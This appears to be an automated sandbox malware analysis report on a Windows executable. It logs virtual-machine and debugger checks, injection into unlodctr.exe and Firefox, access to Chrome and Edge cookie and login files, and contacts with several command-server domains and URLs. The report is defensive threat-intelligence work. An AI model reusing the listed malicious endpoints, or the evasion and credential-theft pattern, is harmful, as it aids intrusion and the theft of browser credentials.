Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtClose: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: NULL target: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: NULL target: C:\Windows\SysWOW64\unlodctr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: NULL target: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: NULL target: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000000.1986087337.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000002.2873092371.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000000.2132854931.0000000001720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000000.1986087337.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000002.2873092371.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000000.2132854931.0000000001720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000000.1986087337.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000002.2873092371.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000000.2132854931.0000000001720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000000.1986087337.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000002.2873092371.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000000.2132854931.0000000001720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: Yara match	File source: 0.2.UQO06iOMKZMPZ4A.exe.3e29990.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UQO06iOMKZMPZ4A.exe.25a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UQO06iOMKZMPZ4A.exe.3e29990.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UQO06iOMKZMPZ4A.exe.25a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1752688007.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1749151470.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Windows Analysis Report UQO06iOMKZMPZ4A.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
UQO06iOMKZMPZ4A.exe

Malware Threat Intel
Provided by

Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
64.225.91.73	www.linbreoffice.org	United States	14061	DIGITALOCEAN-ASNUS	false
66.29.135.159	www.quantumboulevard.xyz	United States	19538	ADVANTAGECOMUS	true
154.213.73.100	www.dntchunkysalsa.com	Seychelles	62468	VPSQUANUS	false
109.70.148.57	klingerlumberltd.com	United Kingdom	25369	BANDWIDTH-ASGB	false
109.123.121.243	www.gattosat.icu	United Kingdom	13213	UK2NET-ASGB	true

Name	Malicious	Antivirus Detection	Reputation
http://www.quantumboulevard.xyz/qruc/?xl=TKQjCngekOUXb4wYgtIljeQn8ysV0DQxkVDYFHPguHHgtawi326eHXwL5/LbdhSUHl1rH91YHPKtuSAwSH4DrTeIYMFIFWvJ0j7VceHyTVuRqxxukq8+akA=&vFLHF=St8dDlnHzrct7	false	Avira URL Cloud: safe	unknown
http://www.gattosat.icu/qruc/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.dntchunkysalsa.com/qruc/?vFLHF=St8dDlnHzrct7&xl=ebTrY2reCe2ZTSPQmCOT7uftBIKel9RxJULKIziXTH46LqUEJduuafb87psJAf6uxD5XXi6v1WxfauXtOkGyHWMQjIrD11Zkal8n9/6ZGFCOuXv54YqdQOw=	false	Avira URL Cloud: safe	unknown
http://www.quantumboulevard.xyz/qruc/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.linbreoffice.org/qruc/	false	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.linbreoffice.org/qruc/?vFLHF=St8dDlnHzrct7&xl=Xmo1lInOanbZEZR5AfqbZqRP40VXQk0TYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3SBcjawfNBsE/jQutHm2oP9EVAL/0u02x0DQ=	false	Avira URL Cloud: malware	unknown
http://www.gattosat.icu/qruc/?xl=UAq9CzGRql0qbxLJ0VHAxYbE6gcH95yIoC7W/FPBEpHWNGr0R1xACLnBcwEc3ZkTuU45ULwzGu2M7+E0XrmRKTDELq+4Gy/k2I5T6z62BN58jG7ys8mA5gg=&vFLHF=St8dDlnHzrct7	true	Avira URL Cloud: safe	unknown
http://www.dntchunkysalsa.com/qruc/	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.klingerlumberltd.com/qruc/?vFLHF=St8dDlnHzrct7&xl=4y8JdVmVqWeea5bbMhnz8aXW/zBNuVIx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrVx3K8AcskdL8Q9MgXuVmjPqiRPQTvnH80A0=	false	Avira URL Cloud: malware	unknown

ID:	1431983
Product:	CloudBasic
Start time:	07:38:05
Start date:	26.04.2024
Sample:	UQO06iOMKZMPZ4A.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e7c340f6eab299b03ba3ffd6760268f9
SHA1:	66669dc3f7e70675b52b5c6293f4365026da17b9
SHA256:	c6f1edef594e1e06a4d16cc58539d4e50ccc5799a675c42291d81fcc567c9d30
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UQO06iOMKZMPZ4A._f857fe58ea09b799fdb0ec55b4d30f47170d3_88b9e8b8_b665316b-1a8c-4954-a90d-ffa3e7949e10\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	0ECA16FD9C83EBE07AC640D492080C54	B154B9E502B3836D69F279F4628DB3CDBE8236F9	5650AACC9298F83AFA395A556E42EED88D3244A34E2219159C9F8BC09B2DF228
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FB8.tmp.dmp	Mini DuMP crash report, 15 streams, Fri Apr 26 05:38:53 2024, 0x1205a4 type	12E6C60BB987F630CE0CF34E6214705A	37CB5B22DCAE971818BB47E94EBD967831CE7EB1	4B39F49F3DDF62686F2EB60448A5A55CFA8B6EFE2E9E1AD68691F8D7A0F49B8A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER518E.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	9459D43BA7392B858E7D4A033DCEC84A	2B0E10A88BED05E1922A6DCEBA36FFFD956481F4	6B4FCF25959DAD49F3A9DF092711554C8E84C478654CD7FC763B9CA48F4016B6
C:\ProgramData\Microsoft\Windows\WER\Temp\WER51CE.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	311E6B5B51A8A990DB35C4C85145222B	E05E115D9D4D545495797416CB0908ADEAAAC229	EEBA5487EF1256B65EBFC1132073E365644136D5401881F364BBC01D16F4BBE8
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UQO06iOMKZMPZ4A.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Temp\17-EIW25	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	0A990E49D03BCFF22475638674F5C4D7	7EB8A7C2645E60B486C9D5E6B9B0910CE8E10D5B	3E2192D3C12F061599340947B05630A63BB4F6169AEEBBB312F46CC988600650